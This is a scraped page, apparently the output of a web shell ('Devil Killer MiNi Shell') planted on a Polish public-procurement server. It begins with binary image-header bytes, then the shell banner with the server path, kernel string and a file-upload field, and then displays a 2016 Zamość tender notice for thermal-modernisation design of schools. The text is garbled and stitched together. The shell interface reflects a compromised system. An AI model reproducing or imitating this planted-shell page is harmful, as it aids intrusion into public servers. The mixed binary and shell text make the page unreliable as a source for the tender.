JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160115/10504-N-2016.html

<p class="kh_header"><b>Zamość: Opracowanie dokumentacji projektowej na termomodernizację obiektów oświatowych na terenie miasta Zamościa</b><br>
<b>Numer ogłoszenia: 10504 - 2016; data zamieszczenia: 15.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zamość , Rynek Wielki 13, 22-400 Zamość, woj. lubelskie, tel. 084 6392084, faks 084 6393054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na termomodernizację obiektów oświatowych na terenie miasta Zamościa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na opracowaniu wielobranżowych  projektów  budowlanych i wykonawczych  docieplenia  obiektów, projektów modernizacji instalacji centralnego ogrzewania (jeśli są wymagane) z zaprojektowaniem źródła ciepła z wykorzystaniem energii z wody gruntowej poprzez odwierty, projekt instalacji fotowoltaicznej, w przypadku konieczności opracowanie raportu oddziaływania na środowisko, uzyskanie decyzji środowiskowej, uzyskanie pozwolenia na budowę, specyfikacji technicznych wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego dla obiektów oświatowych na terenie miasta Zamościa. 
2. Zamówienie jest udzielane w podziale na 3 części (Zadania):
1)	Zadanie nr 1 - Opracowanie dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego na termomodernizację następujących obiektów oświatowych:
a)	Zespół Szkół Nr 2 w Zamościu  ul. Sienkiewicza 5, 
b)	Zespół Szkół Ponadgimnazjalnych Nr 4 ul. Piłsudskiego 65,
c)	Szkoła Podstawowa Nr 6 im. Szymona Szymonowica w Zamościu ul. Orla 5. 

2)	Zadanie nr 2 - Opracowanie dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego na termomodernizację następujących obiektów oświatowych: 
a)	II Liceum Ogólnokształcące im. M. Konopnickiej w Zamościu ul. Partyzantów 68, 
b)	Zespół Szkół Nr 6 w Zamościu ul. Kalinowa 5a. 
c)	Zespół Szkół Nr 3 w Zamościu ul. E. Orzeszkowej 43, 
d)	Zespół Szkół Nr 1 z Oddziałami Integracyjnymi w Zamościu ul. Peowiaków 30a. 

3)	 Zadanie nr 3 - Opracowanie dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego na termomodernizację następujących obiektów oświatowych:
a)	Zespół Szkół Nr 4 w Zamościu ul. Hetmana Jana Zamoyskiego,
b)	III Liceum Ogólnokształcące im. C.K. Norwida w Zamościu ul. Kilińskiego 15, 
c)	Zespół Szkół Ponadgimnazjalnych Nr 3 im  AK w Zamościu ul. Zamoyskiego 62
d)	Szkoła Podstawowa Nr 2 i Gimnazjum Nr 2 w Zamościu ul. Lwowska 15,
e)	 Przedszkole Miejskie Nr 10 w Zamościu ul. Lwowska 17. 

3. Dokumentację projektową należy opracować w oparciu o zakres prac wynikających z audytów energetycznych (zgodnie z wymogami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane), będących załącznikami nr 9, 10, 11 do SIWZ.

4.	Zakres szczegółowy zamówienia (dotyczy Zadania nr 1, Zadania nr 2 i Zadania nr 3): 
Opracowanie wielobranżowych projektów budowlano-wykonawczych docieplenia obiektów, projektów modernizacji instalacji centralnego ogrzewania (jeśli są wymagane) z zaprojektowaniem źródła ciepła z wykorzystaniem energii z wody gruntowej poprzez odwierty, projekt instalacji fotowoltaicznej, w przypadku konieczności opracowanie raportu oddziaływania na środowisko, uzyskanie decyzji środowiskowej, uzyskanie pozwolenia na budowę składających się 
w szczególności z: 

a)	planów, rysunków, szkiców oraz innych dokumentów umożliwiających jednoznaczne określenie rodzaju i zakresu robót podstawowych oraz ich uwarunkowań i dokładnej lokalizacji ich wykonania wraz z usunięciem kolizji 
z istniejącym uzbrojeniem, drzewostanem itp. - tzn. gotowe do złożenia w celu uzyskania pozwolenia na budowę wielobranżowe projekty budowlane wraz z uzgodnieniami i opiniami, zawierające informacje dotyczące bezpieczeństwa i ochrony zdrowia, sporządzonej zgodnie z ustawą z dnia 
7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013r. poz. 1409 z późn. zm), Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. 2012r. poz.462) oraz zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. 2013 r. poz. 1129) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego; 

b)	przedmiaru robót, przez który należy rozumieć opracowanie zawierające zestawienie przewidywanych do wykonania robót, łącznie z robotami nie przewidzianymi w projekcie, ale koniecznymi do wykonania z punktu widzenia sztuki budowlanej w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem ilości jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych robót lub jednostkowych nakładów rzeczowych;

c)	opracowanie dokumentacji geologicznej z terenu, gdzie będą zaprojektowane odwierty dla potrzeb pomp ciepła;

d)	uzgodnień i opinii, jeżeli będą one wymagane odrębnymi przepisami;

e)	specyfikacji technicznej wykonania i odbioru robót budowlanych (opracowanie zawierające zbiór wymagań, które są niezbędne do określenia standardu i jakości wykonania robot, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót) sporządzona zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. 2013. poz. 1129);

f)	opracowana dokumentacja winna spełniać wymogi do aplikowania 
o dofinansowanie z Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2014-2020 Oś Priorytetowa 4 - Energia przyjazna środowisku.

5.	Wykonawca zobowiązuje się do wykonania przedmiotu umowy oddzielnie dla każdego z obiektów oświatowych wchodzących w zakres danego Zadania.
6.	Szczegółowy opis wykonania przedmiotu zamówienia oraz zakres prac zawarty jest w umowach stanowiących integralną część tych umów, będących załącznikami nr 8a, 8b, 8c do SIWZ.
7.	Każdy Wykonawca może złożyć w niniejszym postępowaniu o udzielenie zamówienia publicznego oferty częściowe na jedną, dwie lub więcej części zamówienia (Zadanie). Przy czym na jedną część zamówienia (Zadanie) może złożyć tylko jedną ofertę..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.07.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium oddzielnie dla poszczególnych części zamówienia (Zadań) w wysokości:
1)	Zadanie nr 1 - 1.500,00 zł (słownie: jeden tysiąc pięćset złotych 00/100)
2)	Zadanie nr 2 - 2.000,00 zł (słownie: dwa tysiące złotych 00/100)
3)	Zadanie nr 3 - 3.000,00 zł (słownie: trzy tysiące złotych 00/100)
2.	Wadium może być wnoszone w jednej lub kilku następujących formach określonych w art. 45  ust. 6 ustawy Prawo zamówień publicznych, tj.:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-kredytowej, z tym że poręczenie kasy  jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej  Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz.U. z 2014r. poz.1804).                        
3	Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto:  PKO Bank Polski S.A. Oddział w Zamościu, nr konta 74 1020 5356 0000 1102 0007 7768</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie. Wykonawca potwierdza spełnianie warunku poprzez złożenie Oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie nr 1 
Zamawiający przy ocenie spełniania przez Wykonawcę warunku wiedzy                     i doświadczenia będzie brał pod uwagę wyłącznie główne usługi wykonane, a w przypadku świadczeń okresowych lub ciągłych, również wykonywane     w okresie ostatnich trzech lat przed upływem terminu składania ofert,                      a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, które zostaną poparte dowodami wskazującymi, czy zostały wykonane lub są wykonywane w sposób należyty.
Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę                                   i doświadczenie, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -                           w tym okresie - wykaże się wykonaniem w sposób zgodny                                     z obowiązującymi przepisami oraz zasadami wiedzy technicznej                          i ukończonej w terminie co najmniej jednej usługi, polegającej                             na wykonaniu wielobranżowego* projektu budowlanego 
i wykonawczego termomodernizacji budynków o kubaturze co najmniej 6000 m3. 
   
* Pod pojęciem wielobranżowego projektu budowlanego 
i wykonawczego Zamawiający rozumie wykonanie projektu budowlanego i wykonawczego w następujących branżach: konstrukcyjno-budowlanej, sanitarnej, elektrycznej i  teletechnicznej.

Wykonawca załączy dowody określające, czy usługi te zostały wykonane lub w przypadku świadczeń okresowych lub ciągłych - są wykonywane należycie.

Zadanie nr 2 
Zamawiający przy ocenie spełniania przez Wykonawcę warunku wiedzy                       i doświadczenia będzie brał pod uwagę wyłącznie główne usługi wykonane, a w przypadku świadczeń okresowych lub ciągłych, również wykonywane            w okresie ostatnich trzech lat przed upływem terminu składania ofert,                         a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, które zostaną poparte dowodami wskazującymi, czy zostały wykonane lub są wykonywane w sposób należyty.
Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę                                   i doświadczenie, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -                           w tym okresie - wykaże się wykonaniem w sposób zgodny                                     z obowiązującymi przepisami oraz zasadami wiedzy technicznej                          i ukończonej w terminie co najmniej jednej usługi, polegającej                             na wykonaniu wielobranżowego* projektu budowlanego 
i wykonawczego termomodernizacji budynków o kubaturze co najmniej niż 15000 m3.    

* Pod pojęciem wielobranżowego projektu budowlanego 
i wykonawczego Zamawiający rozumie wykonanie projektu budowlanego i wykonawczego w następujących branżach: konstrukcyjno-budowlanej, sanitarnej, elektrycznej i  teletechnicznej.


Wykonawca załączy dowody określające, czy usługi te zostały wykonane lub w przypadku świadczeń okresowych lub ciągłych - są wykonywane należycie.

Zadanie nr 3 
Zamawiający przy ocenie spełniania przez Wykonawcę warunku wiedzy                     i doświadczenia będzie brał pod uwagę wyłącznie główne usługi wykonane, a w przypadku świadczeń okresowych lub ciągłych, również wykonywane      w okresie ostatnich trzech lat przed upływem terminu składania ofert,                          a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, które zostaną poparte dowodami wskazującymi, czy zostały wykonane lub są wykonywane w sposób należyty.
Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę                                   i doświadczenie, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -                           w tym okresie - wykaże się wykonaniem w sposób zgodny                                     z obowiązującymi przepisami oraz zasadami wiedzy technicznej                          i ukończonej w terminie co najmniej jednej usługi, polegającej                             na wykonaniu wielobranżowego* projektu budowlanego 
i wykonawczego termomodernizacji budynków o kubaturze co najmniej 22000 m3.  

* Pod pojęciem wielobranżowego projektu budowlanego 
i wykonawczego Zamawiający rozumie wykonanie projektu budowlanego i wykonawczego w następujących branżach: konstrukcyjno-budowlanej, sanitarnej, elektrycznej i  teletechnicznej.


Wykonawca załączy dowody określające, czy usługi te zostały wykonane lub w przypadku świadczeń okresowych lub ciągłych - są wykonywane należycie.

UWAGA: 
W przypadku składania oferty na więcej niż jedno Zadanie, wykazanie spełnienie warunku posiadania wiedzy i doświadczenia w zakresie określonym dla Zadania 3, zwalnia Wykonawcę z obowiązku wykazywania spełnianie tego warunku dla Zadania 1 i Zadania 2.                   W przypadku składania oferty wyłącznie na Zadanie 1 i Zadanie 2 wykazanie spełnienie warunku posiadania wiedzy i doświadczenia                     w zakresie określonym dla Zadania 2, zwalnia Wykonawcę z obowiązku wykazywania spełnianie tego warunku dla Zadania 1.

Wartości pieniężne wskazane w dokumentach złożonych przez Wykonawcę dotyczące warunków udziału w postępowaniu, podane w walutach innych niż PLN, Wykonawca przeliczy na złote polskie wg średniego kursu walut NBP 
z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu nie będzie opublikowany średni kurs walut przez NBP, Wykonawca powinien przyjąć kurs przeliczeniowy z ostatniej opublikowanej tabeli kursów NBP przed dniem publikacji ogłoszenia  o zamówieniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie nr 1
Wykonawca wykaże dysponowanie osobami o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia. 
Wykonawca wykaże dysponowanie osobami o odpowiednich uprawnieniach, tj.: 
1)	 główny projektant, koordynujący działania zespołu projektowego posiadający uprawnienia budowlane do projektowania                                w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów,
2)	 wielobranżowy zespół projektowy składający się z osób posiadających odpowiednie uprawnienia budowlane do projektowania w specjalnościach:
-	w specjalności instalacyjnej w zakresie sieci, instalacji                              i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, 
-	w specjalności instalacyjnej w zakresie sieci, instalacji                             i urządzeń telekomunikacyjnych lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, 
-	 w specjalności instalacyjnej w zakresie sieci, instalacji                                i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, wydane na podstawie wcześniej obowiązujących przepisów. 
Główny projektant oraz projektanci tworzący wielobranżowy zespół projektowy powinien posiadać uprawnienia budowlane do projektowania zgodnie  z ustawą z dnia 7 lipca 1994r. Prawo budowlane (tekst jedn. Dz.U.  z 2013 r. poz. 1409 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r. poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Zgodnie z art. 12a ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tekst jedn. Dz.U. z 2013 r. poz. 1409 z późn. zm.) samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63 poz.394, z późn. zm.).

Zadanie nr 2 
Wykonawca wykaże dysponowanie osobami o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia. 
Wykonawca wykaże dysponowanie osobami o odpowiednich uprawnieniach, tj.: 
1)	 główny projektant, koordynujący działania zespołu projektowego posiadający uprawnienia budowlane do projektowania                              w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów,
2)	 wielobranżowy zespół projektowy składający się z osób posiadających odpowiednie uprawnienia budowlane do projektowania w specjalnościach:
-	w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, 
-	w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, 
-	 w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, wydane na podstawie wcześniej obowiązujących przepisów. 
Główny projektant oraz projektanci tworzący wielobranżowy zespół projektowy powinien posiadać uprawnienia budowlane do projektowania zgodnie  z ustawą z dnia 7 lipca 1994r. Prawo budowlane (tekst jedn. Dz.U.  z 2013 r. poz. 1409 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r. poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Zgodnie z art. 12a ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tekst jedn. Dz.U. z 2013 r. poz. 1409 z późn. zm.) samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63 poz.394, z późn. zm.).

Zadanie nr 3 
Wykonawca wykaże dysponowanie osobami o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia. 
Wykonawca wykaże dysponowanie osobami o odpowiednich uprawnieniach, tj.: 
1)	 główny projektant, koordynujący działania zespołu projektowego posiadający uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów,
2)	 wielobranżowy zespół projektowy składający się z osób posiadających odpowiednie uprawnienia budowlane do projektowania w specjalnościach:
-	 w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, 
-	 w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, 
-	 w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, wydane na podstawie wcześniej obowiązujących przepisów,

Główny projektant oraz projektanci tworzący wielobranżowy zespół projektowy powinien posiadać uprawnienia budowlane do projektowania zgodnie  z ustawą z dnia 7 lipca 1994r. Prawo budowlane (tekst jedn. Dz.U.  z 2013 r. poz. 1409 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r. poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Zgodnie z art. 12a ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tekst jedn. Dz.U. z 2013 r. poz. 1409 z późn. zm.) samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63 poz.394, z późn. zm.).

UWAGA: Zamawiający dopuszcza możliwość wykazania tej samej osoby przewidzianej do pełnienia funkcji głównego projektanta oraz osób tworzących wielobranżowy zespół projektowy dla wszystkich Zadań (1-3).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże posiadanie środków finansowych lub zdolności kredytowej:
a)	dla Zadania nr 1 - w wysokości co najmniej    32 000,00 zł,
b)	dla Zadania nr 2 - w wysokości co najmniej    50 000,00 zł,
c)	dla Zadania nr 3 - w wysokości co najmniej    67 000,00 zł.
